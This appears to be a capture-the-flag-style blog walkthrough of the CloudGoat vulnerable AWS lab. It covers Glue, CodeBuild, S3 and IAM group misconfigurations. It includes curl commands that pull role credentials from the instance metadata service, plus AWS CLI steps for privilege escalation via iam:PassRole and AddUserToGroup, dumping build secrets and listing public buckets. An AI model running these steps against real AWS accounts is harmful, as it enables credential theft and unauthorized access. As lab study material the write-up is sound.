Playing with CloudGoat part 4: security nuances of AWS Glue, CodeBuild and S3 services
Today it's time to go through the last attractions prepared by the guys from Rhino Security Labs: AWS Glue, CodeBuild, S3, as well as unused groups and roles. But no worries, that won't be the last episode 😉 If you don't know what CloudGoat is, I recommend going through the whole series starting from part 1.
The starting point of today's post is a scenario in which an attacker gets SSH access to a Glue Development Endpoint. I've modified the default configuration of CloudGoat a little to be able to chain the presented attacks. So, before we can dive into AWS hacking, let's set up the lab.
Once you've deployed the default configuration of CloudGoat, you may be surprised to see an empty AWS Glue configuration. As you can find in CloudGoat's README.md file:
The Glue development endpoint is disabled by default due to it costing far more than the whole rest of CloudGoat to run. If you would like to enable the Glue development endpoint (estimated at $1 per hour), uncomment the final three lines of “start.sh”, uncomment the final eight lines of “kill.sh”, uncomment the final two lines of “extract_creds.py”, and uncomment the file located at “./terraform/glue.tf”.
Then you have to upload the public key (the ./keys/cloudgoat_key.pub file) to the Dev Endpoint. At the time of writing this post, this isn't done automatically, and it's mandatory if you want to SSH into the endpoint.
I've also modified the glue_dev_endpoint role by adding the iam:PassRole permission to its policy_for_glue_role policy, and I've added the Glue service as a trusted entity to the unused codebuild_project role. I made these modifications to make this scenario more interesting; I'll explain why later.
After following these steps and running the start.sh script, it's finally time to start playing with the Glue service.
What is AWS Glue? Amazon describes it in the following way:
AWS Glue is a fully managed extract, transform, and load (ETL) service that makes it easy for customers to prepare and load their data for analytics. You can create and run an ETL job with a few clicks in the AWS Management Console. You simply point AWS Glue to your data stored on AWS, and AWS Glue discovers your data and stores the associated metadata (e.g. table definition and schema) in the AWS Glue Data Catalog. Once cataloged, your data is immediately searchable, queryable, and available for ETL.
How does it work? First, you set a source of data, e.g. logs in multiple S3 buckets. AWS Glue will then crawl your data sources and construct your Data Catalog, e.g. in a JSON format. Next, the service will generate ETL code in Scala or Python to extract data from the source, transform the data to match the target schema, and load it into the target (e.g. loading data as tables into Amazon Redshift). You can develop your own scripts, and to test them you can use the Glue Development Endpoint. This environment can be accessed via SSH:
ssh -i <private_key> glue@<public_address>
Today's scenario starts from this point. With a shell on a Glue Development Endpoint, an attacker can perform any action allowed by the assigned role, e.g. listing all Glue Dev Endpoints:
As you can see, the glue_dev_endpoint role is assigned, so an attacker with SSH access effectively has all the permissions granted to that role (defined in policy_for_glue_role). Do you remember from part 1 how the temporary credentials of an assigned role can be accessed?
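From the endpoint's shell, the enumeration can be reproduced with a single AWS CLI call (a sketch; the region is an assumption, and the role name follows the CloudGoat defaults):

```shell
# List all Glue development endpoints visible to the assigned role
aws glue get-dev-endpoints --region us-east-1

# Each returned endpoint includes the attached role, e.g.:
#   "RoleArn": "arn:aws:iam::<account-id>:role/glue_dev_endpoint"
```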
Just a quick recap: the metadata is available under the non-routable address http://169.254.169.254/. Let's check whether I can reach the temporary credentials of the role assigned to the Dev Endpoint the same way I did on an EC2 instance:
I highlighted the commands I executed with a red line and the responses with a green line. What's interesting here is that most of the EC2 metadata API endpoints are disabled within a Glue instance, but not the important one 🙀 The temporary credentials are always available under the name… "dummy"… no matter how the assigned role is named 😄
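The check itself is just a couple of curl calls against the instance metadata service; note that the role name in the credentials path is literally "dummy":

```shell
# Listing the available role names returns "dummy"
# regardless of what the assigned role is actually called:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Fetch the temporary credentials (AccessKeyId, SecretAccessKey, Token):
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
```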
If you're using the default CloudGoat configuration, this scenario can end here: at this stage an attacker can call any "dynamodb:*" action and nothing more. However, in my modified version an attacker can create a new Glue Development Endpoint (thanks to iam:PassRole), this time with a different role assigned (which is possible thanks to the added trusted entity for the Glue service).
Keep in mind that an attacker can enumerate the available roles without ANY permissions!!!
In CloudGoat there's an unused role called codebuild_project. Let's assign this role to a new Glue Development Endpoint and upload the public SSH key there:
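Creating the endpoint with the stolen credentials could look like this (a sketch: the endpoint name and account id are made up, and the key file path assumes the key generated earlier):

```shell
# Create a new Glue dev endpoint with the codebuild_project role attached;
# this requires glue:CreateDevEndpoint plus iam:PassRole on that role,
# and the role must trust the Glue service
aws glue create-dev-endpoint \
    --endpoint-name privesc-endpoint \
    --role-arn arn:aws:iam::123456789012:role/codebuild_project \
    --public-key file://cloudgoat_key.pub
```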
As you can see above, the status is "PROVISIONING"; you have to wait several minutes until the endpoint is ready to use. After that, list the endpoints to get the public IP of your new dev endpoint:
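A single endpoint can also be polled directly until it leaves the PROVISIONING state (the endpoint name here is a hypothetical one):

```shell
# Poll until Status changes from PROVISIONING to READY,
# then read PublicAddress to know where to SSH
aws glue get-dev-endpoint --endpoint-name privesc-endpoint \
    --query 'DevEndpoint.[Status,PublicAddress]'
```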
Now it's time to SSH into the new endpoint, and that's how I obtained the new permissions (defined in the policy assigned to the codebuild_project role).
Amazon describes CodeBuild as:
AWS CodeBuild is a fully managed continuous integration service that compiles source code, runs tests, and produces software packages that are ready to deploy. With CodeBuild, you don’t need to provision, manage, and scale your own build servers. CodeBuild scales continuously and processes multiple builds concurrently, so your builds are not left waiting in a queue.
In other words, it's a continuous integration service that allows you to build, test and deploy projects from source, e.g. from your GitHub repository.
AWS CodeBuild provides several built-in environment variables and also allows you to define your own. There are two types of those variables: plaintext and parameter. Sensitive values, like secrets or access keys, should be stored in the Parameter Store and then retrieved from your build spec.
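The recommended pattern is to keep the secret in SSM Parameter Store and only reference it from the build spec; storing one could look like this (the parameter name and value are made up for illustration):

```shell
# Store the secret encrypted at rest in the Parameter Store...
aws ssm put-parameter --name /cloudgoat/db_password \
    --type SecureString --value 'super_secret_value'

# ...and reference it in buildspec.yml instead of a plaintext variable:
#   env:
#     parameter-store:
#       DB_PASSWORD: /cloudgoat/db_password
```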
Let’s check out how it’s done in CloudGoat:
It looks like the developers didn't follow best practices. Secrets like super_secret (or even kinda_secret 😉) should never be stored as plaintext environment variables, because, as you can see above, they can be easily displayed via the AWS CodeBuild console or the AWS CLI ☝️
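With the stolen credentials, dumping those variables takes two CLI calls (the project name below is hypothetical; use whatever list-projects returns):

```shell
# Discover the CodeBuild projects visible to the role
aws codebuild list-projects

# Dump project details, including any plaintext environment variables
aws codebuild batch-get-projects --names cg-codebuild-project \
    --query 'projects[].environment.environmentVariables'
```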
CloudGoat is about AWS (in)security, so it would be weird if there were no mention of the most common issue: leaks of data via publicly available content of S3 buckets. Using the codebuild_project role I can list all available S3 buckets:
What's interesting here is that the second bucket allows public listing. By default the bucket is empty, so I put the ultra_secret.txt file there just as an example. You can list the bucket's content via a browser, without any authentication:
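The same listing can be reproduced both with the CLI and with a plain unauthenticated HTTP request (the bucket name is a placeholder):

```shell
# Enumerate buckets with the codebuild_project role's credentials
aws s3 ls

# A bucket that allows public listing answers even without credentials;
# the XML response enumerates the keys, e.g. ultra_secret.txt
curl https://cg-public-bucket.s3.amazonaws.com/

# Unauthenticated listing works via the CLI too:
aws s3 ls s3://cg-public-bucket --no-sign-request
```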
If you think such cases are too lame to be real, I strongly encourage you to go through my own research: how I found more than 5K buckets with publicly available data, more than 1.3K of which allowed me to (over)write any object.
To finish all the scenarios prepared in CloudGoat, I also have to mention the case of the unused group PinpointManagement. A user with permission to add himself to a different group can obtain new privileges. That means that if a user Bob has the iam:AddUserToGroup permission, he can add himself to the PinpointManagement group. Thanks to this action, Bob can now call any action allowed by the policies attached to that group.
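The escalation itself is a single call (the user and group names follow the example above):

```shell
# Bob adds himself to the more privileged group...
aws iam add-user-to-group --user-name Bob --group-name PinpointManagement

# ...and can verify his new membership:
aws iam list-groups-for-user --user-name Bob
```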
Is that all?
In the blog posts published so far in the "Playing with CloudGoat" series, I went through *cough* I hope *cough* all the AWS security issues prepared by Rhino Security Labs. For hacking AWS services I mainly used the AWS CLI and some external tools. Such a "manual" way of hacking wasn't very convenient, because it requires remembering commands and their arguments, as well as knowing some external tools.
Ahead of us is the final episode of the "Playing with CloudGoat" series, in which I'll introduce Pacu, the AWS exploitation framework, also made by Rhino Security Labs. Using this Metasploit-like tool I'll go through all the CloudGoat issues to show you how much easier and more effective such attacks (a penetration test) can be. So, as always: stay tuned!!!